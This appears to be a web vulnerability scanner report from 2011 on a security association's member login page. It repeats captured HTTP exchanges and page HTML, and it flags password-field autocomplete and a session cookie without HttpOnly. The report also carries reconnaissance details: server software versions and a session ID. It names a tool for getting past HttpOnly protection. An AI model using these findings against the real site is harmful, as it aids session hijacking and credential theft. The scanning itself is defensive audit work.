Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8b mod_bwlimited/1.4 PHP/5.2.9
X-Powered-By: PHP/5.2.9
Set-Cookie: PHPSESSID=d959e12eb1519d0294397b6c62589f93; path=/,cookiecheck=issa
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>Member Login</title>
<meta name="description" content="The ISSA is an unbiased third party made up solely of security practitioners and, as such, is not motivated by politics or profits; only the ethical professionalism of our members and their dedication to protecting information resources in a professional manner. ">
<meta name="keywords" content="security, security association, network security, internet security, data security">
<meta name="verify-v1" content="FwJolkV798m+nBxL9ELBCqQEogmxS8dxHUGv89Q1naM=" />
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7"/>
<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link href="/css/FluidOneColumn.css" rel="stylesheet" type="text/css" />
<link href="/css/issa.css" rel="stylesheet" type="text/css" />
<link href="/css/nav.css" rel="stylesheet" type="text/css" />
<script type="text/javaScript" src="/js/jquery.js"></script>
<script type="text/javaScript" src="/js/nav.js"></script>
<script type="text/javaScript" src="/js/antispam.js"></script>
<script type="text/javaScript" src="/js/table.js"></script>
<script type="text/javascript">
<!--
$(document).ready(
function()
{
renderBanners();
alternateRowColors();
$("a[@name]").css({padding: "0", background: "none"});
var CurrentHeight = 0;
$(document).ready(function() {
resizeULs();
});
$(window).bind("resize", function() {
resizeULs();
});
}
);
function resizeULs()
{
$("ul.Layout").each(function(j) {
CurrentHeight = 0;
$(this).find("li").each(function(i) {
if (CurrentHeight < $(this).height()) {
CurrentHeight = $(this).height();
}
});
$(this).find("li").each(function(i) {
$(this).css("padding-bottom", (CurrentHeight - $(this).height() + i) + "px");
});
});
}
function resize(div){
var d=document.getElementById(div);
if(navigator.appName=="Microsoft Internet Explorer"){
//ie
if(navigator.appVersion.indexOf('MSIE')>0){
d.style.height=document.documentElement.scrollHeight;
}
}else if(navigator.userAgent.indexOf("Chrome")>0){
//chrome
d.style.height=document.body.scrollHeight+"px";
}else{
//ff and all other nice browsers
d.style.height=document.documentElement.scrollHeight+"px";
}
}
-->
</script>
<!--<script>
$(function(){
$('#Sponsors').cycle({
fx: 'fade',
delay: -500
});
});
</script>-->
</head>
<body>
<div id="wrapLeft">
<div id="wrapRight">
<div id="Container">
<div id="TopBar">
<a id="NewsFeed" href="https://connect.issa.org
">Log in and check out the new ISSA Connect!</a>
<a href="/" id="Home">Home</a>
<a href="/page/?p=Site_Map_2" id="SiteMap">Site Map</a>
<a href="/Members/Log-In.php" id="LogIn">Log In</a>
<a href="/page/?p=33" id="Contact">Contact</a>
</div>
<div id="LogoBar">
<div id="searchFormContainer">
<div id="searchForm">
<form name="search" method="get" action="/search.php">
<a href="javascript:document.search.submit();">search</a>
<input type="text" name="q" size="20" style="font-size:12px;border-width:1px;" />
</form>
</div>
</div>
<a href="/" id="Logo"></a>
<div style="width:409px;height:85px;">
</div>
</div>
<div id="nav">
<ul id="jsddm">
<li><a href="/page/?p=Profile_16">About ISSA</a>
<ul>
<li><a href="/page/?p=Profile_16">Association</a></li>
<li><a href="/page/?p=77">International Board</a></li>
<li><a href="/page/?p=17">Code of Ethics</a></li>
<li><a href="/page/?p=33">Contact</a></li>
<li><a href="http://ciso.issa.org/">CISO Executive Forum</a></li>
<!--<li><a href="/Association/25year.html">25th Anniversary</a></li>-->
<li><a href="/page/?p=18">FAQ</a></li>
</ul>
</li>
<li><a href="https://connect.issa.org/index.jspa">Connect</a>
<ul>
<li><a href="/page/?p=Benefits_of_Membership_9">Benefits of Membership</a></li>
<li><a href="https://www.issa.org/page/?p=86">Dues</a></li>
<li><a href="https://connect.issa.org/index.jspa">ISSA Connect</a></li>
<li><a href="/page/?p=Application_Form_6">Membership Application</a></li>
<li><a href="/page/?p=Membership_Types_10">Membership Types</a></li>
<!--<li><a href="/page/?p=Join_Online_8">Join Online</a></li>-->
<!--<li><a href="/page/?p=Renew_Online_7">Renew Online</a></li>-->
</ul>
</li>
<li><a href="#">Learn</a>
<ul>
<li><a href="http://ciso.issa.org/">CISO Executive Forum</a></li>
<li><a href="/News/">E-News</a></li>
<li><a href="/events/#2">Industry Events</a></li>
<li><a href="/page/?p=70">Industry Webinars</a></li>
<li><a href="/page/?p=105">International Conference</a></li>
<li><a href="/events/#1">ISSA Events</a></li>
<li><a href="/Members/Journal/">ISSA Journal</a></li>
<li><a href="/page/?p=57">ISSA Web Conferences</a></li>
<li><a href="/page/?p=Whitepapers_11">Whitepapers</a></li>
</ul>
</li>
<li><a href="#">Advance</a>
<ul>
<li><a href="/page/?p=21">Award - Honorees</a></li>
<li><a href="/page/?p=Careers_12">Career Center</a></li>
<li><a href="/page/?p=20">Community Outreach</a></li>
<li><a href="/page/?p=117">Educational Advisory Council</a></li>
<li><a href="/page/?p=269">Fellow Program</a></li>
<li><a href="/page/?p=Certifications_13">Industry Certifications</a></li>
</ul>
</li>
<li><a href="/Members/Your-Profile.html">Members</a>
<ul>
<li><a href="/page/?p=138">Elections</a></li>
<li><a href="/Resources/?p=SupportMaterials">Member Resources</a></li>
<li><a href="/Members/Member-Search.html">Member Search</a></li>
<li><a href="/page/?p=78">Membership Card</a></li>
<li><a href="/Members/Your-Profile.html">My Profile</a></li>
<li><a href="/page/?p=ISSA_Buyers_Guide_and_Discount_Directory_3">Special Offers</a></li>
<li><a href="/page/?p=Call_for_Volunteers_5">Volunteer</a></li>
</ul>
</li>
<li><a href="#">Chapters</a>
<ul>
<li><a href="/Chapters/Chapter-Administration.html">Admin</a></li>
<li><a href="/Chapters/Chapter-Directory.html">Chapter Directory</a></li>
<li><a href="/conf/?p=172">Chapter Leaders Congress</a></li>
<li><a href="/Chapters/?p=CPAC">CPAC Information</a></li>
<li><a href="/Members/Log-In.php">Officer Login</a></li>
<li><a href="/page/?p=27">Start a Chapter</a></li>
</ul>
</li>
<li><a href="#">Sponsorship</a>
<ul>
<li><a href="/page/?p=41">Become a Sponsor</a></li>
<li><a href="/Members/Journal/">ISSA Journal</a></li>
<li><a href="/Sponsorship/?p=MediaKit">Media Kit</a></li>
<li><a href="/page/?p=ISSA_Sponsors_39">Patron Sponsors</a></li>
</ul>
</li>
<li><a><span style="color:#FFB90F"><strong>Join Now</strong></span></a>
<ul>
<li><a href="/page/?p=Join_Online_8">New Members</a></li>
<li><a href="/Join/Renew-Online.html">Returning Members</a></li>
</ul>
</li>
</ul>
</div>
<div id="Content">
<script type="text/javascript" src="sha1.js"></script> <script language="javascript"> <!-- CurrentlyVisible = "MemberNumber"; function SelectRadio(IDtoSelect) { document.getElementById("Use" + IDtoSelect).checked="true"; document.getElementById(CurrentlyVisible + "Identification").style.display="none"; if (IDtoSelect == "AccountReset") { document.getElementById("loginBlockTwo").style.borderRight="none"; document.getElementById("loginBlockThree").style.display="none"; } else { document.getElementById("loginBlockTwo").style.borderRight="1px solid #CCCCCC"; document.getElementById("loginBlockThree").style.display="block"; } document.getElementById(IDtoSelect + "Identification").style.display="block"; if (IDtoSelect == 'EmailFirstLast') { ObjectSelected = document.getElementById('EmailAddress'); ObjectSelected.focus(); } else if (IDtoSelect == 'AccountReset') { ObjectSelected = document.getElementById('EmailAddressReset'); ObjectSelected.focus(); } else { ObjectSelected = document.getElementById(IDtoSelect); ObjectSelected.focus(); } CurrentlyVisible = IDtoSelect; } --> </script> <style type="text/css"> <!-- label:hover { cursor: pointer; } td#loginBlockOne { padding: 0; border: none; } td#loginBlockOne td { border: none; padding: .25em; vertical-align: middle; } td#loginBlockOne label { font-family: Tahoma, sans-serif; font-size: .9em; margin: 0; padding: 0; } td#loginBlockTwo { padding: 0; padding-left: 1%; border: none; border-left: 1px solid #CCCCCC; border-right: 1px solid #CCCCCC; } input.TextField { width: 80%; max-width: 15em; } td#loginBlockThree { padding: 0; padding-left: 1%; border: none; } h2.loginBlock { padding: 0; margin: 0; border: none; } div#MemberNumberIdentification { display:block; } div#UsernameIdentification { display:none; } div#EmailFirstLastIdentification { display:none; } div#AccountResetIdentification { display:none; } --> </style> <div id="ColumnB"><h1>Member Login</h1> <form id="LogInForm" method="POST" action=""> <table style="position: relative"> <tr> <td id="loginBlockOne" width="33%"> <h2 class="loginBlock">1. Login Type</h2> <table> <tr> <td><input name="LoginType" type="radio" value="MemberNumber" id="UseMemberNumber" checked onMouseUp="SelectRadio('MemberNumber');" /></td> <td><label for="UseMemberNumber" onMouseUp="SelectRadio('MemberNumber');">Member Number</label></td> </tr> <tr> <td><input name="LoginType" type="radio" value="Username" id="UseUsername" onMouseUp="SelectRadio('Username');" /></td> <td><label for="UseUsername" onMouseUp="SelectRadio('Username');">Username</label></td> </tr> <tr> <td><input name="LoginType" type="radio" value="EmailFirstLast" id="UseEmailFirstLast" onMouseUp="SelectRadio('EmailFirstLast');" /></td> <td><label for="UseEmailFirstLast" onMouseUp="SelectRadio('EmailFirstLast');">E-mail, First Name, Last Name</label></td> </tr> <tr> <td><input name="LoginType" type="radio" value="AccountReset" id="UseAccountReset" onMouseUp="SelectRadio('AccountReset');" /></td> <td><label for="UseAccountReset" onMouseUp="SelectRadio('AccountReset');">New Account or Forgotten Password</label></td> </tr> </table> </td> <td id="loginBlockTwo" width="31%"> <h2 class="loginBlock">2. Identification</h2> <div id="MemberNumberIdentification"> <h3>Member Number</h3> <input type="text" id="MemberNumber" name="MemberNumber" class="TextField" /> </div> <div id="UsernameIdentification"> <h3>Username</h3> <input type="text" id="Username" name="Username" class="TextField" /> <p><strong>NOTE:</strong> Usernames are no longer issued. If you have one, you may use it; otherwise, please use your member number.</p> </div> <div id="EmailFirstLastIdentification"> <h3>Email Address</h3> <input type="text" id="EmailAddress" name="EmailAddress" class="TextField" /> <h3>First Name</h3> <input type="text" id="FirstName" name="FirstName" class="TextField" /> <h3>Last Name</h3> <input type="text" id="LastName" name="LastName" class="TextField" /> </div> <div id="AccountResetIdentification"> <h3>Email Address</h3> <input type="text" id="EmailAddressReset" name="EmailAddressReset" class="TextField" /> <p><input type="submit" id="Reset" value="Reset Password"></p> <p><strong>NOTE:</strong> if you don't know your e-mail address, please <a href="/Association/Contact.html">call ISSA</a> for password reset assistance.</p> </div> </td> <td id="loginBlockThree"> <h2 class="loginBlock">3. Password</h2> <h3>Password</h3> <input type="password" id="SubmittedPassword" name="SubmittedPassword" class="TextField" /> <p><input type="submit" id="Submit" value="Log In"></p> </td> </tr> </table> </form> </div> <div id="Footer"> <p><a href="..
Auto Complete Enabled
Auto Complete Enabled
"Auto Complete" was enabled in one or more of the form fields. These were either "password" fields or important fields such as "Credit Card".
Impact
Data entered in these fields will be cached by the browser. An attacker who can access the victim's browser could steal this information. This is especially important if the application is commonly used in shared computers such as cyber cafes or airport terminals.
Add the attribute autocomplete="off"
to the form tag or to individual "input" fields.
Actions to Take
- See the remedy for the solution.
- Find all instances of inputs which store private data and disable autocomplete. Fields which contain data such as "Credit Card" or "CCV" type data should not be cached. You can allow the application to cache usernames and remember passwords, however, in most cases this is not recommended.
- Re-scan the application after addressing the identified issues to ensure that all of the fixes have been applied properly.
Required Skills for Successful Exploitation
Dumping all data from a browser can be fairly easy and there exist a number of automated tools to undertake this. Where the attacker cannot dump the data, he/she could still browse the recently visited websites and activate the auto-complete feature to see previously entered values.
External References
SubmittedPassword
Request
GET /Members/Log-In.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.issa.org
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Response
HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 21:32:34 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8b mod_bwlimited/1.4 PHP/5.2.9
X-Powered-By: PHP/5.2.9
Set-Cookie: PHPSESSID=d959e12eb1519d0294397b6c62589f93; path=/,cookiecheck=issa
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>Member Login</title>
<meta name="description" content="The ISSA is an unbiased third party made up solely of security practitioners and, as such, is not motivated by politics or profits; only the ethical professionalism of our members and their dedication to protecting information resources in a professional manner. ">
<meta name="keywords" content="security, security association, network security, internet security, data security">
<meta name="verify-v1" content="FwJolkV798m+nBxL9ELBCqQEogmxS8dxHUGv89Q1naM=" />
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7"/>
<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link href="/css/FluidOneColumn.css" rel="stylesheet" type="text/css" />
<link href="/css/issa.css" rel="stylesheet" type="text/css" />
<link href="/css/nav.css" rel="stylesheet" type="text/css" />
<script type="text/javaScript" src="/js/jquery.js"></script>
<script type="text/javaScript" src="/js/nav.js"></script>
<script type="text/javaScript" src="/js/antispam.js"></script>
<script type="text/javaScript" src="/js/table.js"></script>
<script type="text/javascript">
<!--
$(document).ready(
function()
{
renderBanners();
alternateRowColors();
$("a[@name]").css({padding: "0", background: "none"});
var CurrentHeight = 0;
$(document).ready(function() {
resizeULs();
});
$(window).bind("resize", function() {
resizeULs();
});
}
);
function resizeULs()
{
$("ul.Layout").each(function(j) {
CurrentHeight = 0;
$(this).find("li").each(function(i) {
if (CurrentHeight < $(this).height()) {
CurrentHeight = $(this).height();
}
});
$(this).find("li").each(function(i) {
$(this).css("padding-bottom", (CurrentHeight - $(this).height() + i) + "px");
});
});
}
function resize(div){
var d=document.getElementById(div);
if(navigator.appName=="Microsoft Internet Explorer"){
//ie
if(navigator.appVersion.indexOf('MSIE')>0){
d.style.height=document.documentElement.scrollHeight;
}
}else if(navigator.userAgent.indexOf("Chrome")>0){
//chrome
d.style.height=document.body.scrollHeight+"px";
}else{
//ff and all other nice browsers
d.style.height=document.documentElement.scrollHeight+"px";
}
}
-->
</script>
<!--<script>
$(function(){
$('#Sponsors').cycle({
fx: 'fade',
delay: -500
});
});
</script>-->
</head>
<body>
<div id="wrapLeft">
<div id="wrapRight">
<div id="Container">
<div id="TopBar">
<a id="NewsFeed" href="https://connect.issa.org
">Log in and check out the new ISSA Connect!</a>
<a href="/" id="Home">Home</a>
<a href="/page/?p=Site_Map_2" id="SiteMap">Site Map</a>
<a href="/Members/Log-In.php" id="LogIn">Log In</a>
<a href="/page/?p=33" id="Contact">Contact</a>
</div>
<div id="LogoBar">
<div id="searchFormContainer">
<div id="searchForm">
<form name="search" method="get" action="/search.php">
<a href="javascript:document.search.submit();">search</a>
<input type="text" name="q" size="20" style="font-size:12px;border-width:1px;" />
</form>
</div>
</div>
<a href="/" id="Logo"></a>
<div style="width:409px;height:85px;">
</div>
</div>
<div id="nav">
<ul id="jsddm">
<li><a href="/page/?p=Profile_16">About ISSA</a>
<ul>
<li><a href="/page/?p=Profile_16">Association</a></li>
<li><a href="/page/?p=77">International Board</a></li>
<li><a href="/page/?p=17">Code of Ethics</a></li>
<li><a href="/page/?p=33">Contact</a></li>
<li><a href="http://ciso.issa.org/">CISO Executive Forum</a></li>
<!--<li><a href="/Association/25year.html">25th Anniversary</a></li>-->
<li><a href="/page/?p=18">FAQ</a></li>
</ul>
</li>
<li><a href="https://connect.issa.org/index.jspa">Connect</a>
<ul>
<li><a href="/page/?p=Benefits_of_Membership_9">Benefits of Membership</a></li>
<li><a href="https://www.issa.org/page/?p=86">Dues</a></li>
<li><a href="https://connect.issa.org/index.jspa">ISSA Connect</a></li>
<li><a href="/page/?p=Application_Form_6">Membership Application</a></li>
<li><a href="/page/?p=Membership_Types_10">Membership Types</a></li>
<!--<li><a href="/page/?p=Join_Online_8">Join Online</a></li>-->
<!--<li><a href="/page/?p=Renew_Online_7">Renew Online</a></li>-->
</ul>
</li>
<li><a href="#">Learn</a>
<ul>
<li><a href="http://ciso.issa.org/">CISO Executive Forum</a></li>
<li><a href="/News/">E-News</a></li>
<li><a href="/events/#2">Industry Events</a></li>
<li><a href="/page/?p=70">Industry Webinars</a></li>
<li><a href="/page/?p=105">International Conference</a></li>
<li><a href="/events/#1">ISSA Events</a></li>
<li><a href="/Members/Journal/">ISSA Journal</a></li>
<li><a href="/page/?p=57">ISSA Web Conferences</a></li>
<li><a href="/page/?p=Whitepapers_11">Whitepapers</a></li>
</ul>
</li>
<li><a href="#">Advance</a>
<ul>
<li><a href="/page/?p=21">Award - Honorees</a></li>
<li><a href="/page/?p=Careers_12">Career Center</a></li>
<li><a href="/page/?p=20">Community Outreach</a></li>
<li><a href="/page/?p=117">Educational Advisory Council</a></li>
<li><a href="/page/?p=269">Fellow Program</a></li>
<li><a href="/page/?p=Certifications_13">Industry Certifications</a></li>
</ul>
</li>
<li><a href="/Members/Your-Profile.html">Members</a>
<ul>
<li><a href="/page/?p=138">Elections</a></li>
<li><a href="/Resources/?p=SupportMaterials">Member Resources</a></li>
<li><a href="/Members/Member-Search.html">Member Search</a></li>
<li><a href="/page/?p=78">Membership Card</a></li>
<li><a href="/Members/Your-Profile.html">My Profile</a></li>
<li><a href="/page/?p=ISSA_Buyers_Guide_and_Discount_Directory_3">Special Offers</a></li>
<li><a href="/page/?p=Call_for_Volunteers_5">Volunteer</a></li>
</ul>
</li>
<li><a href="#">Chapters</a>
<ul>
<li><a href="/Chapters/Chapter-Administration.html">Admin</a></li>
<li><a href="/Chapters/Chapter-Directory.html">Chapter Directory</a></li>
<li><a href="/conf/?p=172">Chapter Leaders Congress</a></li>
<li><a href="/Chapters/?p=CPAC">CPAC Information</a></li>
<li><a href="/Members/Log-In.php">Officer Login</a></li>
<li><a href="/page/?p=27">Start a Chapter</a></li>
</ul>
</li>
<li><a href="#">Sponsorship</a>
<ul>
<li><a href="/page/?p=41">Become a Sponsor</a></li>
<li><a href="/Members/Journal/">ISSA Journal</a></li>
<li><a href="/Sponsorship/?p=MediaKit">Media Kit</a></li>
<li><a href="/page/?p=ISSA_Sponsors_39">Patron Sponsors</a></li>
</ul>
</li>
<li><a><span style="color:#FFB90F"><strong>Join Now</strong></span></a>
<ul>
<li><a href="/page/?p=Join_Online_8">New Members</a></li>
<li><a href="/Join/Renew-Online.html">Returning Members</a></li>
</ul>
</li>
</ul>
</div>
<div id="Content">
<script type="text/javascript" src="sha1.js"></script> <script language="javascript"> <!-- CurrentlyVisible = "MemberNumber"; function SelectRadio(IDtoSelect) { document.getElementById("Use" + IDtoSelect).checked="true"; document.getElementById(CurrentlyVisible + "Identification").style.display="none"; if (IDtoSelect == "AccountReset") { document.getElementById("loginBlockTwo").style.borderRight="none"; document.getElementById("loginBlockThree").style.display="none"; } else { document.getElementById("loginBlockTwo").style.borderRight="1px solid #CCCCCC"; document.getElementById("loginBlockThree").style.display="block"; } document.getElementById(IDtoSelect + "Identification").style.display="block"; if (IDtoSelect == 'EmailFirstLast') { ObjectSelected = document.getElementById('EmailAddress'); ObjectSelected.focus(); } else if (IDtoSelect == 'AccountReset') { ObjectSelected = document.getElementById('EmailAddressReset'); ObjectSelected.focus(); } else { ObjectSelected = document.getElementById(IDtoSelect); ObjectSelected.focus(); } CurrentlyVisible = IDtoSelect; } --> </script> <style type="text/css"> <!-- label:hover { cursor: pointer; } td#loginBlockOne { padding: 0; border: none; } td#loginBlockOne td { border: none; padding: .25em; vertical-align: middle; } td#loginBlockOne label { font-family: Tahoma, sans-serif; font-size: .9em; margin: 0; padding: 0; } td#loginBlockTwo { padding: 0; padding-left: 1%; border: none; border-left: 1px solid #CCCCCC; border-right: 1px solid #CCCCCC; } input.TextField { width: 80%; max-width: 15em; } td#loginBlockThree { padding: 0; padding-left: 1%; border: none; } h2.loginBlock { padding: 0; margin: 0; border: none; } div#MemberNumberIdentification { display:block; } div#UsernameIdentification { display:none; } div#EmailFirstLastIdentification { display:none; } div#AccountResetIdentification { display:none; } --> </style> <div id="ColumnB"><h1>Member Login</h1> <form id="LogInForm" method="POST" action=""> <table style="position: relative"> <tr> <td id="loginBlockOne" width="33%"> <h2 class="loginBlock">1. Login Type</h2> <table> <tr> <td><input name="LoginType" type="radio" value="MemberNumber" id="UseMemberNumber" checked onMouseUp="SelectRadio('MemberNumber');" /></td> <td><label for="UseMemberNumber" onMouseUp="SelectRadio('MemberNumber');">Member Number</label></td> </tr> <tr> <td><input name="LoginType" type="radio" value="Username" id="UseUsername" onMouseUp="SelectRadio('Username');" /></td> <td><label for="UseUsername" onMouseUp="SelectRadio('Username');">Username</label></td> </tr> <tr> <td><input name="LoginType" type="radio" value="EmailFirstLast" id="UseEmailFirstLast" onMouseUp="SelectRadio('EmailFirstLast');" /></td> <td><label for="UseEmailFirstLast" onMouseUp="SelectRadio('EmailFirstLast');">E-mail, First Name, Last Name</label></td> </tr> <tr> <td><input name="LoginType" type="radio" value="AccountReset" id="UseAccountReset" onMouseUp="SelectRadio('AccountReset');" /></td> <td><label for="UseAccountReset" onMouseUp="SelectRadio('AccountReset');">New Account or Forgotten Password</label></td> </tr> </table> </td> <td id="loginBlockTwo" width="31%"> <h2 class="loginBlock">2. Identification</h2> <div id="MemberNumberIdentification"> <h3>Member Number</h3> <input type="text" id="MemberNumber" name="MemberNumber" class="TextField" /> </div> <div id="UsernameIdentification"> <h3>Username</h3> <input type="text" id="Username" name="Username" class="TextField" /> <p><strong>NOTE:</strong> Usernames are no longer issued. If you have one, you may use it; otherwise, please use your member number.</p> </div> <div id="EmailFirstLastIdentification"> <h3>Email Address</h3> <input type="text" id="EmailAddress" name="EmailAddress" class="TextField" /> <h3>First Name</h3> <input type="text" id="FirstName" name="FirstName" class="TextField" /> <h3>Last Name</h3> <input type="text" id="LastName" name="LastName" class="TextField" /> </div> <div id="AccountResetIdentification"> <h3>Email Address</h3> <input type="text" id="EmailAddressReset" name="EmailAddressReset" class="TextField" /> <p><input type="submit" id="Reset" value="Reset Password"></p> <p><strong>NOTE:</strong> if you don't know your e-mail address, please <a href="/Association/Contact.html">call ISSA</a> for password reset assistance.</p> </div> </td> <td id="loginBlockThree"> <h2 class="loginBlock">3. Password</h2> <h3>Password</h3> <input type="password" id="SubmittedPassword" name="SubmittedPassword" class="TextField" /> <p><input type="submit" id="Submit" value="Log In"></p> </td> </tr> </table> </form> </div> <div id="Footer"> <p><a href="..
Cookie Not Marked As HttpOnly
Cookie Not Marked As HttpOnly
Cookie was not marked as HTTPOnly. HTTPOnly cookies can not be read by client-side scripts therefore marking a cookie as HTTPOnly can provide an additional layer of protection against Cross-site Scripting attacks..
Impact
During a Cross-site Scripting attack an attacker might easily access cookies and hijack the victim's session.
Actions to Take
- See the remedy for solution
- Consider marking all of the cookies used by the application as HTTPOnly (After these changes javascript code will not able to read cookies.
Mark the cookie as HTTPOnly. This will be an extra layer of defence against XSS. However this is not a silver bullet and will not protect the system against Cross-site Scripting attacks. An attacker can use a tool such as
XSS Tunnel to bypass HTTPOnly protection.
External References
PHPSESSID
Request
GET /Members/Log-In.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.issa.org
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Response
HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 21:32:34 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8b mod_bwlimited/1.4 PHP/5.2.9
X-Powered-By: PHP/5.2.9
Set-Cookie: PHPSESSID=d959e12eb1519d0294397b6c62589f93; path=/,cookiecheck=issa
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>Member Login</title>
<meta name="description" content="The ISSA is an unbiased third party made up solely of security practitioners and, as such, is not motivated by politics or profits; only the ethical professionalism of our members and their dedication to protecting information resources in a professional manner. ">
<meta name="keywords" content="security, security association, network security, internet security, data security">
<meta name="verify-v1" content="FwJolkV798m+nBxL9ELBCqQEogmxS8dxHUGv89Q1naM=" />
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7"/>
<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link href="/css/FluidOneColumn.css" rel="stylesheet" type="text/css" />
<link href="/css/issa.css" rel="stylesheet" type="text/css" />
<link href="/css/nav.css" rel="stylesheet" type="text/css" />
<script type="text/javaScript" src="/js/jquery.js"></script>
<script type="text/javaScript" src="/js/nav.js"></script>
<script type="text/javaScript" src="/js/antispam.js"></script>
<script type="text/javaScript" src="/js/table.js"></script>
<script type="text/javascript">
<!--
$(document).ready(
function()
{
renderBanners();
alternateRowColors();
$("a[@name]").css({padding: "0", background: "none"});
var CurrentHeight = 0;
$(document).ready(function() {
resizeULs();
});
$(window).bind("resize", function() {
resizeULs();
});
}
);
function resizeULs()
{
$("ul.Layout").each(function(j) {
CurrentHeight = 0;
$(this).find("li").each(function(i) {
if (CurrentHeight < $(this).height()) {
CurrentHeight = $(this).height();
}
});
$(this).find("li").each(function(i) {
$(this).css("padding-bottom", (CurrentHeight - $(this).height() + i) + "px");
});
});
}
function resize(div){
var d=document.getElementById(div);
if(navigator.appName=="Microsoft Internet Explorer"){
//ie
if(navigator.appVersion.indexOf('MSIE')>0){
d.style.height=document.documentElement.scrollHeight;
}
}else if(navigator.userAgent.indexOf("Chrome")>0){
//chrome
d.style.height=document.body.scrollHeight+"px";
}else{
//ff and all other nice browsers
d.style.height=document.documentElement.scrollHeight+"px";
}
}
-->
</script>
<!--<script>
$(function(){
$('#Sponsors').cycle({
fx: 'fade',
delay: -500
});
});
</script>-->
</head>
<body>
<div id="wrapLeft">
<div id="wrapRight">
<div id="Container">
<div id="TopBar">
<a id="NewsFeed" href="https://connect.issa.org
">Log in and check out the new ISSA Connect!</a>
<a href="/" id="Home">Home</a>
<a href="/page/?p=Site_Map_2" id="SiteMap">Site Map</a>
<a href="/Members/Log-In.php" id="LogIn">Log In</a>
<a href="/page/?p=33" id="Contact">Contact</a>
</div>
<div id="LogoBar">
<div id="searchFormContainer">
<div id="searchForm">
<form name="search" method="get" action="/search.php">
<a href="javascript:document.search.submit();">search</a>
<input type="text" name="q" size="20" style="font-size:12px;border-width:1px;" />
</form>
</div>
</div>
<a href="/" id="Logo"></a>
<div style="width:409px;height:85px;">
</div>
</div>
<div id="nav">
<ul id="jsddm">
<li><a href="/page/?p=Profile_16">About ISSA</a>
<ul>
<li><a href="/page/?p=Profile_16">Association</a></li>
<li><a href="/page/?p=77">International Board</a></li>
<li><a href="/page/?p=17">Code of Ethics</a></li>
<li><a href="/page/?p=33">Contact</a></li>
<li><a href="http://ciso.issa.org/">CISO Executive Forum</a></li>
<!--<li><a href="/Association/25year.html">25th Anniversary</a></li>-->
<li><a href="/page/?p=18">FAQ</a></li>
</ul>
</li>
<li><a href="https://connect.issa.org/index.jspa">Connect</a>
<ul>
<li><a href="/page/?p=Benefits_of_Membership_9">Benefits of Membership</a></li>
<li><a href="https://www.issa.org/page/?p=86">Dues</a></li>
<li><a href="https://connect.issa.org/index.jspa">ISSA Connect</a></li>
<li><a href="/page/?p=Application_Form_6">Membership Application</a></li>
<li><a href="/page/?p=Membership_Types_10">Membership Types</a></li>
<!--<li><a href="/page/?p=Join_Online_8">Join Online</a></li>-->
<!--<li><a href="/page/?p=Renew_Online_7">Renew Online</a></li>-->
</ul>
</li>
<li><a href="#">Learn</a>
<ul>
<li><a href="http://ciso.issa.org/">CISO Executive Forum</a></li>
<li><a href="/News/">E-News</a></li>
<li><a href="/events/#2">Industry Events</a></li>
<li><a href="/page/?p=70">Industry Webinars</a></li>
<li><a href="/page/?p=105">International Conference</a></li>
<li><a href="/events/#1">ISSA Events</a></li>
<li><a href="/Members/Journal/">ISSA Journal</a></li>
<li><a href="/page/?p=57">ISSA Web Conferences</a></li>
<li><a href="/page/?p=Whitepapers_11">Whitepapers</a></li>
</ul>
</li>
<li><a href="#">Advance</a>
<ul>
<li><a href="/page/?p=21">Award - Honorees</a></li>
<li><a href="/page/?p=Careers_12">Career Center</a></li>
<li><a href="/page/?p=20">Community Outreach</a></li>
<li><a href="/page/?p=117">Educational Advisory Council</a></li>
<li><a href="/page/?p=269">Fellow Program</a></li>
<li><a href="/page/?p=Certifications_13">Industry Certifications</a></li>
</ul>
</li>
<li><a href="/Members/Your-Profile.html">Members</a>
<ul>
<li><a href="/page/?p=138">Elections</a></li>
<li><a href="/Resources/?p=SupportMaterials">Member Resources</a></li>
<li><a href="/Members/Member-Search.html">Member Search</a></li>
<li><a href="/page/?p=78">Membership Card</a></li>
<li><a href="/Members/Your-Profile.html">My Profile</a></li>
<li><a href="/page/?p=ISSA_Buyers_Guide_and_Discount_Directory_3">Special Offers</a></li>
